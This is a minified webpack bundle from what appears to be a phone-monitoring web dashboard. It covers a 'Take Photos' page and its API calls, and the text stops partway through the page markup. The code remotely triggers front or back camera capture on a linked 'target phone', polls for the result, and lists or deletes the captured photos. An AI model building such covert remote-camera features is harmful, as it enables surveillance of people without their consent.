(self["webpackChunk_N_E"] = self["webpackChunk_N_E"] || []).push([[5168],{

/***/ 57941:
/***/ (function(__unused_webpack_module, __unused_webpack_exports, __webpack_require__) {


    (window.__NEXT_P = window.__NEXT_P || []).push([
      "/android/local/take-photos",
      function () {
        return __webpack_require__(65282);
      }
    ]);
    if(false) {}
  

/***/ }),

/***/ 19630:
/***/ (function(__unused_webpack_module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export */ __webpack_require__.d(__webpack_exports__, {
/* harmony export */   "Cq": function() { return /* binding */ getCode; },
/* harmony export */   "DF": function() { return /* binding */ androidLocalRefresh; },
/* harmony export */   "LW": function() { return /* binding */ localShooting; },
/* harmony export */   "UC": function() { return /* binding */ localPhoneSendEmailios; },
/* harmony export */   "ds": function() { return /* binding */ CheckCode; },
/* harmony export */   "gM": function() { return /* binding */ checkAppLastVersion; },
/* harmony export */   "lm": function() { return /* binding */ localPhoneSendEmailandroid; },
/* harmony export */   "sk": function() { return /* binding */ setBlock; },
/* harmony export */   "zW": function() { return /* binding */ androidLocalRecordQuestionRrecycleGet; }
/* harmony export */ });
/* unused harmony exports localPhoneSendEmail, androidLocalAsyncDataStatus */
/* harmony import */ var _src_utils_request__WEBPACK_IMPORTED_MODULE_0__ = __webpack_require__(93103);
/* harmony import */ var qs__WEBPACK_IMPORTED_MODULE_1__ = __webpack_require__(80129);
/* harmony import */ var qs__WEBPACK_IMPORTED_MODULE_1___default = /*#__PURE__*/__webpack_require__.n(qs__WEBPACK_IMPORTED_MODULE_1__);


//apk注册码
const getCode = (options)=>_src_utils_request__WEBPACK_IMPORTED_MODULE_0__/* ["default"].get */ .Z.get("/api/user/get-device-code", options);
//apk验证注册码是否绑定
const CheckCode = (options)=>_src_utils_request__WEBPACK_IMPORTED_MODULE_0__/* ["default"].post */ .Z.post("/api/user/check-device-code", options);
// 判断本地app是否最新版本
const checkAppLastVersion = (options)=>_src_utils_request__WEBPACK_IMPORTED_MODULE_0__/* ["default"].get */ .Z.get("/api/get-app/version?" + qs__WEBPACK_IMPORTED_MODULE_1___default().stringify(options));
// 本地app请求刷新
const androidLocalRefresh = (options)=>_src_utils_request__WEBPACK_IMPORTED_MODULE_0__/* ["default"].post */ .Z.post("/api/device/android-local-reset-data", options);
// 本地app录制状态获取
const androidLocalRecordQuestionRrecycleGet = (options)=>_src_utils_request__WEBPACK_IMPORTED_MODULE_0__/* ["default"].get */ .Z.get("/api/device/android-local-record-question-recycle-get?" + qs__WEBPACK_IMPORTED_MODULE_1___default().stringify(options));
//AndRoid-Local选择moto机型时发送邮件
const localPhoneSendEmail = (options)=>axios.post("/api/definition/target-phone", options);
const localPhoneSendEmailios = (options)=>_src_utils_request__WEBPACK_IMPORTED_MODULE_0__/* ["default"].post */ .Z.post("/api/definition/target-ios-phone", options);
const localPhoneSendEmailandroid = (options)=>_src_utils_request__WEBPACK_IMPORTED_MODULE_0__/* ["default"].post */ .Z.post("/api/definition/target-android-phone", options);
//Block app && Block wifi获取应用解锁状态
const setBlock = (options)=>_src_utils_request__WEBPACK_IMPORTED_MODULE_0__/* ["default"].post */ .Z.post("/api/device/android-local-device-type-limit", options);
//take photos && record video轮训消息
const localShooting = (options)=>_src_utils_request__WEBPACK_IMPORTED_MODULE_0__/* ["default"].get */ .Z.get("/api/a-local-shooting-log", {
        params: options
    });
// apk同步下载数据轮询状态
const androidLocalAsyncDataStatus = (options)=>axios.post("/api/device/android-local-async-data-status", options);


/***/ }),

/***/ 74743:
/***/ (function(__unused_webpack_module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__ = __webpack_require__(85893);
/* harmony import */ var next_image__WEBPACK_IMPORTED_MODULE_1__ = __webpack_require__(25675);
/* harmony import */ var next_image__WEBPACK_IMPORTED_MODULE_1___default = /*#__PURE__*/__webpack_require__.n(next_image__WEBPACK_IMPORTED_MODULE_1__);
/* harmony import */ var src_utils_i18n__WEBPACK_IMPORTED_MODULE_2__ = __webpack_require__(61906);
/* harmony import */ var _ContentLoading_module_css__WEBPACK_IMPORTED_MODULE_3__ = __webpack_require__(74249);
/* harmony import */ var _ContentLoading_module_css__WEBPACK_IMPORTED_MODULE_3___default = /*#__PURE__*/__webpack_require__.n(_ContentLoading_module_css__WEBPACK_IMPORTED_MODULE_3__);




const ContentLoading = (param)=>{
    let { label , fullScreen =false , className =""  } = param;
    const { t  } = (0,src_utils_i18n__WEBPACK_IMPORTED_MODULE_2__/* .useTranslation */ .$G)("common");
    const text = label || t("Loading...");
    return /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
        role: "status",
        "aria-live": "polite",
        "aria-label": text,
        className: "".concat((_ContentLoading_module_css__WEBPACK_IMPORTED_MODULE_3___default().contentLoadingRoot), " ").concat(fullScreen ? (_ContentLoading_module_css__WEBPACK_IMPORTED_MODULE_3___default().contentLoadingRootFullScreen) : "", " ").concat(className).trim(),
        children: [
            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)((next_image__WEBPACK_IMPORTED_MODULE_1___default()), {
                src: "/images/loading/spinner.svg",
                alt: "",
                width: 64,
                height: 64,
                className: (_ContentLoading_module_css__WEBPACK_IMPORTED_MODULE_3___default().contentLoadingSpinner),
                "aria-hidden": "true",
                priority: true
            }),
            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsx)("p", {
                className: (_ContentLoading_module_css__WEBPACK_IMPORTED_MODULE_3___default().contentLoadingLabel),
                children: text
            })
        ]
    });
};
/* harmony default export */ __webpack_exports__["Z"] = (ContentLoading);


/***/ }),

/***/ 82017:
/***/ (function(__unused_webpack_module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export */ __webpack_require__.d(__webpack_exports__, {
/* harmony export */   "A": function() { return /* binding */ useDeviceScopedInit; }
/* harmony export */ });
/* harmony import */ var react__WEBPACK_IMPORTED_MODULE_0__ = __webpack_require__(67294);
/* harmony import */ var react_redux__WEBPACK_IMPORTED_MODULE_1__ = __webpack_require__(9473);
/* harmony import */ var src_store_apps_Common__WEBPACK_IMPORTED_MODULE_2__ = __webpack_require__(34745);



/**

 * 当前选中设备变化时重新执行初始化逻辑（拉数、重置本地 state 等）。

 * 通过 requestKey 与 AbortSignal 丢弃切换前未完成的异步请求。

 *

 * @param {(deviceUser: string, scope: {

 *   context: Object,

 *   signal: AbortSignal,

 *   isCurrent: () => boolean

 * }) => void} initFn - 设备作用域初始化回调，需 useCallback 包裹

 */ function useDeviceScopedInit(initFn) {
    const deviceUser = (0,react_redux__WEBPACK_IMPORTED_MODULE_1__/* .useSelector */ .v9)((state)=>state.Common.deviceUser);
    const context = (0,react_redux__WEBPACK_IMPORTED_MODULE_1__/* .useSelector */ .v9)(src_store_apps_Common__WEBPACK_IMPORTED_MODULE_2__/* .selectDeviceContext */ .VQ);
    const requestKey = (0,react_redux__WEBPACK_IMPORTED_MODULE_1__/* .useSelector */ .v9)(src_store_apps_Common__WEBPACK_IMPORTED_MODULE_2__/* .selectDeviceRequestKey */ .rx);
    const contextRef = (0,react__WEBPACK_IMPORTED_MODULE_0__.useRef)(context);
    contextRef.current = context;
    const effectiveDeviceUser = deviceUser || (context === null || context === void 0 ? void 0 : context.accountId) || (context === null || context === void 0 ? void 0 : context.username);
    (0,react__WEBPACK_IMPORTED_MODULE_0__.useEffect)(()=>{
        if (!effectiveDeviceUser) return;
        const controller = new AbortController();
        let active = true;
        const scopedContext = contextRef.current;
        // 仅当 requestKey 仍与当前 Redux 一致时，才应用异步结果
        const isCurrent = ()=>{
            var ref;
            return active && !controller.signal.aborted && ((ref = contextRef.current) === null || ref === void 0 ? void 0 : ref.requestKey) === requestKey;
        };
        initFn(effectiveDeviceUser, {
            context: scopedContext,
            signal: controller.signal,
            isCurrent
        });
        return ()=>{
            active = false;
            controller.abort();
        };
    }, [
        effectiveDeviceUser,
        initFn,
        requestKey
    ]);
}


/***/ }),

/***/ 65282:
/***/ (function(__unused_webpack_module, __webpack_exports__, __webpack_require__) {

"use strict";
__webpack_require__.r(__webpack_exports__);
/* harmony import */ var react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__ = __webpack_require__(85893);
/* harmony import */ var react__WEBPACK_IMPORTED_MODULE_1__ = __webpack_require__(67294);
/* harmony import */ var next_router__WEBPACK_IMPORTED_MODULE_2__ = __webpack_require__(11163);
/* harmony import */ var next_router__WEBPACK_IMPORTED_MODULE_2___default = /*#__PURE__*/__webpack_require__.n(next_router__WEBPACK_IMPORTED_MODULE_2__);
/* harmony import */ var next_image__WEBPACK_IMPORTED_MODULE_3__ = __webpack_require__(25675);
/* harmony import */ var next_image__WEBPACK_IMPORTED_MODULE_3___default = /*#__PURE__*/__webpack_require__.n(next_image__WEBPACK_IMPORTED_MODULE_3__);
/* harmony import */ var dayjs__WEBPACK_IMPORTED_MODULE_4__ = __webpack_require__(27484);
/* harmony import */ var dayjs__WEBPACK_IMPORTED_MODULE_4___default = /*#__PURE__*/__webpack_require__.n(dayjs__WEBPACK_IMPORTED_MODULE_4__);
/* harmony import */ var _mui_material__WEBPACK_IMPORTED_MODULE_12__ = __webpack_require__(90948);
/* harmony import */ var src_utils_i18n__WEBPACK_IMPORTED_MODULE_5__ = __webpack_require__(61906);
/* harmony import */ var src_api_dashboard__WEBPACK_IMPORTED_MODULE_6__ = __webpack_require__(95629);
/* harmony import */ var react_redux__WEBPACK_IMPORTED_MODULE_7__ = __webpack_require__(9473);
/* harmony import */ var src_store_apps_Common__WEBPACK_IMPORTED_MODULE_8__ = __webpack_require__(34745);
/* harmony import */ var src_api_android__WEBPACK_IMPORTED_MODULE_9__ = __webpack_require__(19630);
/* harmony import */ var src_hooks_useDeviceScopedInit__WEBPACK_IMPORTED_MODULE_10__ = __webpack_require__(82017);
/* harmony import */ var src_utils_readAndroidLocalContext__WEBPACK_IMPORTED_MODULE_13__ = __webpack_require__(26771);
/* harmony import */ var src_components_ContentLoading__WEBPACK_IMPORTED_MODULE_11__ = __webpack_require__(74743);














// 自定义滚动条(div
const ScrollDivShow = (0,_mui_material__WEBPACK_IMPORTED_MODULE_12__/* ["default"] */ .ZP)("div")({
    "-msOverflowStyle": "none",
    /* 适用于 IE 和 Edge */ scrollbarWidth: "thin",
    /* 适用于 Firefox，设置滚动条为细 */ "&::-webkit-scrollbar": {
        width: "4px"
    },
    "&::-webkit-scrollbar-thumb": {
        backgroundColor: "#888",
        /* 设置滚动条滑块的颜色 */ borderRadius: "10px"
    },
    "&::-webkit-scrollbar-track": {
        backgroundColor: "#f1f1f1"
    },
    "@media (max-width: 600px)": {
        "-msOverflowStyle": "none",
        /* 适用于 IE 和 Edge */ scrollbarWidth: "none",
        /* 适用于 Firefox */ "&::-webkit-scrollbar": {
            display: "none"
        }
    }
});
const TakePhotos = (param)=>{
    let {} = param;
    const { t , locale  } = (0,src_utils_i18n__WEBPACK_IMPORTED_MODULE_5__/* .useTranslation */ .$G)("common");
    const dispatch = (0,react_redux__WEBPACK_IMPORTED_MODULE_7__/* .useDispatch */ .I0)();
    const [intiData, setIntiData] = (0,react__WEBPACK_IMPORTED_MODULE_1__.useState)([]) // 原始数据
    ;
    const [showData, setShowData] = (0,react__WEBPACK_IMPORTED_MODULE_1__.useState)([]) // 展示的数据
    ;
    const [allDateDetail, setAllDateDetail] = (0,react__WEBPACK_IMPORTED_MODULE_1__.useState)([]) // 当前所有的时间图片date详情
    ;
    const [allDate, setAllDate] = (0,react__WEBPACK_IMPORTED_MODULE_1__.useState)([]) // 当前所有的日期点
    ;
    const [allTime, setAllTime] = (0,react__WEBPACK_IMPORTED_MODULE_1__.useState)([]) // 当前所有的时间点
    ;
    const [checkAll, setCheckAll] = (0,react__WEBPACK_IMPORTED_MODULE_1__.useState)(false) // 是否全选
    ;
    const [checkDateArr, setCheckDateArr] = (0,react__WEBPACK_IMPORTED_MODULE_1__.useState)([]) // 多选的日期
    ;
    const [checkArr, setCheckArr] = (0,react__WEBPACK_IMPORTED_MODULE_1__.useState)([]) // 多选的图片data
    ;
    const [showDelete, setShowDelete] = (0,react__WEBPACK_IMPORTED_MODULE_1__.useState)(false) // 显示删除弹窗
    ;
    const [clickData, setClickData] = (0,react__WEBPACK_IMPORTED_MODULE_1__.useState)({
        index: -1,
        date: 0,
        url: "",
        position: 0
    }) // 当前点击的图片数据 position(0:首张 1:中间 2:尾张)
    ;
    const [clickFlag, setClickFlag] = (0,react__WEBPACK_IMPORTED_MODULE_1__.useState)(false) // 当前是否为查看图片中
    ;
    const [fullShow, setFullShow] = (0,react__WEBPACK_IMPORTED_MODULE_1__.useState)(false) // 当前是否全屏查看图片
    ;
    const [hoverData, setHoverData] = (0,react__WEBPACK_IMPORTED_MODULE_1__.useState)(-1) // 当前悬浮的按钮
    ;
    const [hoverButton, setHoverButton] = (0,react__WEBPACK_IMPORTED_MODULE_1__.useState)(false) // 新增按钮悬浮状态
    ;
    const [camera, setCamera] = (0,react__WEBPACK_IMPORTED_MODULE_1__.useState)(1) // 前后摄像头(1为后摄2为前摄)
    ;
    const [isShooting, setIsShooting] = (0,react__WEBPACK_IMPORTED_MODULE_1__.useState)(false) // 是否正在拍摄
    ;
    const [shootingResult, setShootingResult] = (0,react__WEBPACK_IMPORTED_MODULE_1__.useState)(0) // 拍摄返回结果(1代表成功，2代表设备关机/没连上网，3代表摄像头被占用，4代表无权限)
    ;
    const [firstTake, setFirstTake] = (0,react__WEBPACK_IMPORTED_MODULE_1__.useState)(false) // 是否弹窗点击拍摄按钮提示框
    ;
    const [firstChoose, setFirstChoose] = (0,react__WEBPACK_IMPORTED_MODULE_1__.useState)(false) // 点击拍摄弹框单选框
    ;
    const [isShowError, setIsShowError] = (0,react__WEBPACK_IMPORTED_MODULE_1__.useState)(false) // 是否展示拍摄报错弹窗
    ;
    const [time] = (0,react__WEBPACK_IMPORTED_MODULE_1__.useState)(dayjs__WEBPACK_IMPORTED_MODULE_4___default()().format("HH:mm:ss")) // 当前时间
    ;
    const [isLoading, setIsLoading] = (0,react__WEBPACK_IMPORTED_MODULE_1__.useState)(true) //正在加载获取数据
    ;
    // 分页参数
    const [pagination, setPagination] = (0,react__WEBPACK_IMPORTED_MODULE_1__.useState)({
        reqNum: 100,
        nowOffset: 0,
        maxNum: false // 全部数据查询完毕
    });
    const groupingData = (arr)=>{
        const groupMap = new Map() // 用 Map 提高查找效率
        ;
        const dateArr = [];
        const timeArr = [];
        arr.forEach((item)=>{
            const date = dayjs__WEBPACK_IMPORTED_MODULE_4___default()(item.date).format("YYYY-MM-DD");
            if (!groupMap.has(date)) {
                groupMap.set(date, []);
                dateArr.push(date) // 第一次遇到就记录日期
                ;
            }
            groupMap.get(date).push(item);
            timeArr.push(item.date) // 顺便收集所有 id
            ;
        });
        // 转成数组格式
        const groupArr = Array.from(groupMap, (param)=>{
            let [date, list] = param;
            return {
                date,
                list
            };
        });
        // 展示数据
        setShowData(groupArr);
        // 保存当前所有的时间点以及图片 id
        const allDateDetail = groupArr.map((item)=>({
                date: item.date,
                list: item.list.map((i)=>i.date)
            }));
        setAllDateDetail(allDateDetail);
        // 保存所有日期点和 id 列表
        setAllDate(dateArr);
        setAllTime(timeArr);
    };
    const getData = (0,react__WEBPACK_IMPORTED_MODULE_1__.useCallback)(async function(nowOffset, deviceUdid) {
        let { isCurrent , replace =false  } = arguments.length > 2 && arguments[2] !== void 0 ? arguments[2] : {};
        const response = await (0,src_api_dashboard__WEBPACK_IMPORTED_MODULE_6__/* .getLocalAndroidAll */ .gH)({
            username: (0,src_utils_readAndroidLocalContext__WEBPACK_IMPORTED_MODULE_13__/* .readUserEmail */ .t)(),
            params: {
                category: "REALTIME_PHOTO_CAPTURE",
                offset: nowOffset,
                limit: pagination.reqNum,
                deviceUdid
            }
        });
        if (isCurrent && !isCurrent()) return;
        setIsLoading(false);
        if (response.data.contents == null) {
            setPagination((page)=>({
                    ...page,
                    maxNum: true
                }));
            return;
        }
        const newArr = [
            ...response.data.contents
        ].sort((a, b)=>b.date - a.date);
        if (replace) {
            setIntiData(newArr);
            groupingData(newArr);
            return;
        }
        setIntiData((old)=>{
            const merged = [
                ...old,
                ...newArr
            ];
            groupingData(merged);
            return merged;
        });
    }, [
        pagination.reqNum
    ]);
    // 设备切换时重置拍照列表并重新拉数
    (0,src_hooks_useDeviceScopedInit__WEBPACK_IMPORTED_MODULE_10__/* .useDeviceScopedInit */ .A)((0,react__WEBPACK_IMPORTED_MODULE_1__.useCallback)((_, param)=>{
        let { context , isCurrent  } = param;
        const deviceUdid = (0,src_utils_readAndroidLocalContext__WEBPACK_IMPORTED_MODULE_13__/* .readLocalDeviceUdid */ .S)(context);
        if (!deviceUdid) return;
        setIntiData([]);
        setShowData([]);
        setAllDateDetail([]);
        setAllDate([]);
        setAllTime([]);
        setCheckAll(false);
        setCheckDateArr([]);
        setCheckArr([]);
        setIsLoading(true);
        setPagination({
            reqNum: 100,
            nowOffset: 0,
            maxNum: false
        });
        getData(0, deviceUdid, {
            isCurrent,
            replace: true
        });
    }, [
        getData
    ]));
    const [scroll, setScroll] = (0,react__WEBPACK_IMPORTED_MODULE_1__.useState)(0);
    const dom = (0,react__WEBPACK_IMPORTED_MODULE_1__.useRef)(null);
    // 监听元素滚动条
    (0,react__WEBPACK_IMPORTED_MODULE_1__.useEffect)(()=>{
        const handleScroll = ()=>{
            if (dom.current) {
                const { scrollTop , scrollHeight , clientHeight  } = dom.current;
                const progress = (scrollTop / (scrollHeight - clientHeight) * 100).toFixed(0);
                if (progress >= 75) setScroll(progress);
            }
        };
        handleScroll();
        if (dom.current) dom.current.addEventListener("scroll", handleScroll);
        return ()=>{
            if (dom.current) dom.current.removeEventListener("scroll", handleScroll);
        };
    }, []);
    (0,react__WEBPACK_IMPORTED_MODULE_1__.useEffect)(()=>{
        if (scroll >= 100) {
            const nowOffset = pagination.nowOffset + pagination.reqNum;
            setPagination((page)=>({
                    ...page,
                    nowOffset
                }));
            if (!pagination.maxNum) getData(nowOffset, (0,src_utils_readAndroidLocalContext__WEBPACK_IMPORTED_MODULE_13__/* .readLocalDeviceUdid */ .S)());
        }
    }, [
        scroll,
        getData,
        pagination.maxNum,
        pagination.nowOffset,
        pagination.reqNum
    ]);
    const changeCheckState = (value)=>{
        if (typeof value === "string") {
            const flag = checkDateArr.includes(value) // 判断是选择还是取消
            ;
            let arr = [];
            showData.map((item)=>{
                if (item.date === value) arr = [
                    ...item.list.map((i)=>i.date)
                ];
            });
            let newCheckArr = [];
            let newDateArr = [];
            if (!flag) {
                newCheckArr = checkArr;
                newDateArr = [
                    ...checkDateArr,
                    value
                ];
                if (checkArr.length <= 0) newCheckArr = arr;
                else {
                    const addArr = [];
                    arr.forEach((item)=>{
                        if (!checkArr.includes(item)) addArr.push(item);
                    });
                    newCheckArr = [
                        ...newCheckArr,
                        ...addArr
                    ];
                }
            } else {
                newCheckArr = [
                    ...checkArr.filter((i)=>!arr.includes(i))
                ];
                newDateArr = [
                    ...checkDateArr.filter((i)=>i !== value)
                ];
            }
            isCheckAll(newCheckArr, newDateArr);
            setCheckArr([
                ...newCheckArr
            ]);
            setCheckDateArr([
                ...newDateArr
            ]);
        } else if (typeof value === "number") {
            const flag1 = checkArr.includes(value) // 判断是选择还是取消
            ;
            // 获取点击图片的当天所有时间点跟id
            let detail = null;
            allDateDetail.forEach((item)=>{
                if (item.list.includes(value)) detail = item;
            });
            // 最新的选择列表
            const newCheckArr1 = !flag1 ? [
                ...checkArr,
                value
            ] : [
                ...checkArr.filter((i)=>i !== value)
            ];
            // 判断是否全选
            let allCheck = true;
            detail.list.forEach((item)=>{
                if (!newCheckArr1.includes(item)) allCheck = false;
            });
            let newDateArr1 = [];
            // 更新当天是否全选
            if (allCheck) newDateArr1 = [
                ...checkDateArr,
                detail.date
            ];
            else newDateArr1 = [
                ...checkDateArr.filter((i)=>i !== detail.date)
            ];
            isCheckAll(newCheckArr1, newDateArr1);
            setCheckArr([
                ...newCheckArr1
            ]);
            setCheckDateArr([
                ...newDateArr1
            ]);
        }
    };
    // 点击全选按钮
    const handleCheckAllClick = ()=>{
        if (allDateDetail.length === 0) return;
        let dateArr = [];
        let timeArr = [];
        if (!checkAll) {
            dateArr = allDate;
            timeArr = allTime;
        }
        setCheckDateArr([
            ...dateArr
        ]);
        setCheckArr([
            ...timeArr
        ]);
        setCheckAll(!checkAll);
    };
    // 判断是否改变全选按钮
    const isCheckAll = (checkArr, checkDateArr)=>{
        if ((checkArr.length !== 0 || checkDateArr.length !== 0) && isArrayEqual(checkArr, allTime) && isArrayEqual(checkDateArr, allDate)) setCheckAll(true);
        else setCheckAll(false);
    };
    // 对比两个数组内容是否一致
    const isArrayEqual = (arr1, arr2)=>{
        if (arr1.length !== arr2.length) return false // 长度不同，直接返回 false
        ;
        const sortedArr1 = [
            ...arr1
        ].sort() // 对数组进行排序（不会改变原数组）
        ;
        const sortedArr2 = [
            ...arr2
        ].sort();
        return sortedArr1.every((value, index)=>value === sortedArr2[index]) // 比较每一项
        ;
    };
    // 删除图片
    const deleteData = async ()=>{
        if (allDateDetail.length === 0) return;
        const res = await (0,src_api_dashboard__WEBPACK_IMPORTED_MODULE_6__/* .delFile */ ._d)({
            username: (0,src_utils_readAndroidLocalContext__WEBPACK_IMPORTED_MODULE_13__/* .readUserEmail */ .t)(),
            params: {
                category: "REALTIME_PHOTO_CAPTURE",
                deviceUdid: (0,src_utils_readAndroidLocalContext__WEBPACK_IMPORTED_MODULE_13__/* .readLocalDeviceUdid */ .S)(),
                idList: checkArr
            }
        });
        if (res.data.status) {
            const newShowData = showData.map((item)=>({
                    ...item,
                    list: [
                        ...item.list
                    ]
                })).filter((i)=>!checkDateArr.includes(i.date));
            newShowData.forEach((item)=>{
                item.list = item.list.filter((i)=>!checkArr.includes(i.date));
            });
            setShowData([
                ...newShowData
            ]);
            const newAllData = allDateDetail.map((item)=>({
                    ...item,
                    list: [
                        ...item.list
                    ]
                })).filter((i)=>!checkDateArr.includes(i.date));
            newAllData.forEach((item)=>{
                item.list = item.list.filter((i)=>!checkArr.includes(i));
            });
            const newInitData = intiData.filter((i)=>!checkArr.includes(i.date));
            setIntiData(newInitData);
            setAllDateDetail([
                ...newAllData
            ]);
            setCheckAll(false);
            setAllDate((old)=>old.filter((i)=>!checkDateArr.includes(i)));
            setAllTime((old)=>old.filter((i)=>!checkArr.includes(i)));
            setCheckArr([]);
            setCheckDateArr([]);
            setShowDelete(true);
            setTimeout(()=>{
                setShowDelete(false);
            }, 3000);
        }
    };
    //新增图片
    const addData = async ()=>{
        setIsShooting(true);
        const timestamp = Date.now();
        const newItem = {
            date: timestamp,
            thumb: false
        };
        setIntiData((prev)=>{
            const newData = [
                ...prev,
                newItem
            ].sort((a, b)=>b.date - a.date);
            groupingData(newData);
            return newData;
        });
        try {
            var ref;
            await (0,src_api_android__WEBPACK_IMPORTED_MODULE_9__/* .androidLocalRefresh */ .DF)({
                device_id: (0,src_utils_readAndroidLocalContext__WEBPACK_IMPORTED_MODULE_13__/* .readLocalDeviceUdid */ .S)(),
                type: 47,
                limit: false,
                front: camera == 1 ? false : true,
                timing: 0
            });
            // 轮询接口
            const result = await pollLocalShooting();
            var ref1;
            const message = (ref1 = result === null || result === void 0 ? void 0 : (ref = result.data) === null || ref === void 0 ? void 0 : ref.message) !== null && ref1 !== void 0 ? ref1 : "";
            if (!message) {
                setShootingResult(2);
            } else if (message.includes("Shooting in progress")) {
                setShootingResult(1);
            } else if (message.includes("The target phone")) {
                setShootingResult(3);
            } else if (message.includes("Camera permission")) {
                setShootingResult(4);
            }
        } catch (err) {
            ;
            setShootingResult(2) // 设置一个超时或失败状态
            ;
        } finally{
            setIntiData((prev)=>{
                const filteredData = prev.filter((item)=>item.thumb !== false);
                groupingData(filteredData);
                return filteredData;
            });
            setIsShooting(false);
            setIsShowError(true);
        }
    };
    // 轮询函数
    async function pollLocalShooting() {
        return new Promise((resolve, reject)=>{
            const interval = 2000 // 每 2 秒轮询
            ;
            const timeout = 20000 // 20 秒超时
            ;
            let timer, timeoutTimer;
            async function check() {
                try {
                    var ref;
                    let result = await (0,src_api_android__WEBPACK_IMPORTED_MODULE_9__/* .localShooting */ .LW)({
                        deviceID: (0,src_utils_readAndroidLocalContext__WEBPACK_IMPORTED_MODULE_13__/* .readLocalDeviceUdid */ .S)(),
                        timing: false,
                        called: "takephotos"
                    });
                    if ((result === null || result === void 0 ? void 0 : result.data) && (result === null || result === void 0 ? void 0 : (ref = result.data) === null || ref === void 0 ? void 0 : ref.message)) {
                        clearInterval(timer);
                        clearTimeout(timeoutTimer);
                        resolve(result);
                    }
                } catch (err) {
                    clearInterval(timer);
                    clearTimeout(timeoutTimer);
                    reject(err);
                }
            }
            check() // 立即执行一次
            ;
            timer = setInterval(check, interval) // 每 2 秒执行一次
            ;
            // 超时处理
            timeoutTimer = setTimeout(()=>{
                clearInterval(timer);
                reject(new Error("轮询超时：20秒内未收到完成状态"));
            }, timeout);
        });
    }
    // 监听现有图片数量
    (0,react__WEBPACK_IMPORTED_MODULE_1__.useEffect)(()=>{
        isCheckAll(checkArr, checkDateArr);
    }, [
        allDate,
        allTime
    ]);
    // 切换当前显示的图片
    const changeClickData = (type)=>{
        const index = clickData.index;
        if (index === -1) return;
        let newIndex = 0;
        if (type === 0) newIndex = index - 1 // 上一张
        ;
        else newIndex = index + 1 // 下一张
        ;
        const { date , thumb  } = intiData[newIndex];
        setClickData({
            index: newIndex,
            date,
            url: thumb.url,
            position: newIndex === 0 ? 0 : newIndex === intiData.length - 1 ? 2 : 1
        });
    };
    // 当 fullShow 变为 false 时，重置屏幕缩放
    (0,react__WEBPACK_IMPORTED_MODULE_1__.useEffect)(()=>{
        const metaTag = document.querySelector('meta[name="viewport"]');
        if (!metaTag) return;
        if (!fullShow) {
            metaTag.setAttribute("content", "width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no");
        } else {
            metaTag.setAttribute("content", "width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=5, user-scalable=yes");
        }
    }, [
        fullShow
    ]);
    // 获取当前语种的dayjs
    (0,react__WEBPACK_IMPORTED_MODULE_1__.useEffect)(()=>{
        const handleLocale = async ()=>{
            switch(locale){
                case "fr":
                    await __webpack_require__.e(/* import() */ 6023).then(__webpack_require__.t.bind(__webpack_require__, 96023, 23));
                    dayjs__WEBPACK_IMPORTED_MODULE_4___default().locale("fr");
                    break;
                case "jp":
                    await __webpack_require__.e(/* import() */ 6831).then(__webpack_require__.t.bind(__webpack_require__, 76831, 23));
                    dayjs__WEBPACK_IMPORTED_MODULE_4___default().locale("ja");
                    break;
                case "es":
                    await __webpack_require__.e(/* import() */ 7763).then(__webpack_require__.t.bind(__webpack_require__, 91844, 23));
                    dayjs__WEBPACK_IMPORTED_MODULE_4___default().locale("es");
                    break;
                case "de":
                    await __webpack_require__.e(/* import() */ 790).then(__webpack_require__.t.bind(__webpack_require__, 80790, 23));
                    dayjs__WEBPACK_IMPORTED_MODULE_4___default().locale("de");
                    break;
                case "it":
                    await __webpack_require__.e(/* import() */ 5551).then(__webpack_require__.t.bind(__webpack_require__, 15551, 23));
                    dayjs__WEBPACK_IMPORTED_MODULE_4___default().locale("it");
                    break;
                case "pt":
                    await __webpack_require__.e(/* import() */ 5001).then(__webpack_require__.t.bind(__webpack_require__, 15001, 23));
                    dayjs__WEBPACK_IMPORTED_MODULE_4___default().locale("pt");
                    break;
                case "kr":
                    await __webpack_require__.e(/* import() */ 9132).then(__webpack_require__.t.bind(__webpack_require__, 19132, 23));
                    dayjs__WEBPACK_IMPORTED_MODULE_4___default().locale("ko");
                    break;
                case "ar":
                    await __webpack_require__.e(/* import() */ 3939).then(__webpack_require__.t.bind(__webpack_require__, 63939, 23));
                    dayjs__WEBPACK_IMPORTED_MODULE_4___default().locale("ar");
                    break;
                case "tr":
                    await __webpack_require__.e(/* import() */ 3035).then(__webpack_require__.t.bind(__webpack_require__, 73035, 23));
                    dayjs__WEBPACK_IMPORTED_MODULE_4___default().locale("tr");
                    break;
                default:
                    await __webpack_require__.e(/* import() */ 5054).then(__webpack_require__.t.bind(__webpack_require__, 25054, 23));
                    dayjs__WEBPACK_IMPORTED_MODULE_4___default().locale("en");
            }
        };
        handleLocale();
    }, [
        locale
    ]);
    (0,react__WEBPACK_IMPORTED_MODULE_1__.useEffect)(()=>{
        const title = t("Take Photos");
        dispatch((0,src_store_apps_Common__WEBPACK_IMPORTED_MODULE_8__/* .setCurrentTab */ .Lw)(title));
        return ()=>dispatch((0,src_store_apps_Common__WEBPACK_IMPORTED_MODULE_8__/* .setCurrentTab */ .Lw)(""));
    }, [
        dispatch,
        t
    ]);
    return /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)(react__WEBPACK_IMPORTED_MODULE_1__.Fragment, {
        children: [
            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                className: "w-full !h-[calc(var(--vh2)*100-215px)] smj:!h-[calc(var(--vh2)*100-90px)] [box-shadow:0px_0px_12px_0px_#00000021] rounded-[10px] overflow-hidden relative touch-none",
                children: [
                    /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
                        className: "w-full p-[23px_35px_22px_32px] smj:p-[15px_12px_22px_16px] [border-bottom:1px_solid_#E2E2E4] sticky top-0 bg-[#FFFFFF]",
                        children: [
                            /*#__PURE__*/ (0,react_jsx_runtime__WEBPACK_IMPORTED_MODULE_0__.jsxs)("div", {
